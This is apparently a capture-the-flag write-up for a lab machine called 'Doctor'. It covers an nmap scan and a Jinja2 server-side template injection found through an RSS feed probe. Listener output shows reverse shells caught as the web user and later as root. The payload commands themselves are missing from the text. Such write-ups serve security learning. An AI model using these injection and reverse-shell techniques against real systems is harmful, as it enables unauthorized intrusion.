# Nmap 7.91 scan initiated Sun Feb 14 19:31:04 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.10.209 Nmap scan report for 10.10.10.209 Host is up (0.056s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA) | 256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA) |_ 256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | http-methods: |_ Supported Methods: POST OPTIONS HEAD GET |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Doctor 8089/tcp open ssl/http Splunkd httpd | http-methods: |_ Supported Methods: GET HEAD OPTIONS | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Splunkd |_http-title: splunkd | ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser | Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2020-09-06T15:57:27 | Not valid after: 2023-09-06T15:57:27 | MD5: db23 4e5c 546d 8895 0f5f 8f42 5e90 6787 |_SHA-1: 7ec9 1bb7 343f f7f6 bdd7 d015 d720 6f6f 19e2 098b Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Feb 14 19:33:51 2021 -- 1 IP address (1 host up) scanned in 166.52 seconds
We can try to inject a SSTI
payload to see if it is executed and reflected.
As the box is not realistic and most challenge "developers" only know
python and never try another language so it's almost safe to assume the
web app is coded in python and the template engine will be Jinja2.
Let's try {{ 7*7 }}, on the RSS feed we can see <item><title>49</title></item>
so we know the payload is executed.
Let's directly try a simple RCE to get a reverse shell:
After triggering the RSS feed I received the connection on my listener:
1 2 3 4 5 6 7
$ pwncat -l 9999 -vv INFO: Listening on :::9999 (family 10/IPv6, TCP) INFO: Listening on 0.0.0.0:9999 (family 2/IPv4, TCP) INFO: Client connected from 10.10.10.209:50334 (family 2/IPv4, TCP) bash: cannot set terminal process group (864): Inappropriate ioctl for device bash: no job control in this shell web@doctor:~$
$ pwncat -l 8888 -vv INFO: Listening on 0.0.0.0:8888 (family 2/IPv4, TCP) INFO: Client connected from 10.10.10.209:35294 (family 2/IPv4, TCP) bash: cannot set terminal process group (1143): Inappropriate ioctl for device bash: no job control in this shell root@doctor:/# id uid=0(root) gid=0(root) groups=0(root)